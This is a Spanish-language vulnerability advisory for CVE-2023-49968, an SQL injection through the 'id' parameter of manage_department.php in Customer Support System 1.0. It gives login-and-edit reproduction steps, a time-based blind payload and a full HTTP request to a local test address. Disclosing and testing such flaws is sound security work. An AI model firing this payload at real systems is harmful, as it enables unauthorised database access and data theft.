
Sistema de Soporte al Cliente 1.0 - Vulnerabilidad de Inyección SQL en manage_department.php a través del parámetro URL "id"
Description: Existe una vulnerabilidad de Inyección SQL en la versión 1 del Customer Support System. Un atacante con intenciones maliciosas puede ejecutar comandos SQL en la base de datos MySQL manipulando el parámetro URL 'id' al editar un departamento.
Versión del Producto Vulnerable: Customer Support System 1.0
Autor del CVE: Geraldo Alcântara
Fecha: 28/11/2023
Confirmado en: 19/12/2023
CVE: CVE-2023-49968
Probado en: Windows
1- Inicie sesión en la aplicación.
2- Navegue a la página de edición de departamentos, haga clic en el botón 'Acción' y seleccione 'Editar'.
3- Se pasará el parámetro 'id', permitiendo la inserción de un payload malicioso.
payload: (select*from(select(sleep(5)))a)
GET /customer_support/manage_department.php?id=(select*from(select(sleep(5)))a) HTTP/1.1
Host: 192.168.68.182
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://192.168.68.182/customer_support/index.php?page=department_list
Cookie: PHPSESSID=arlocktakq815fq1lpm5fjml9n
Descubridor(es)/Créditos:
Geraldo Alcântara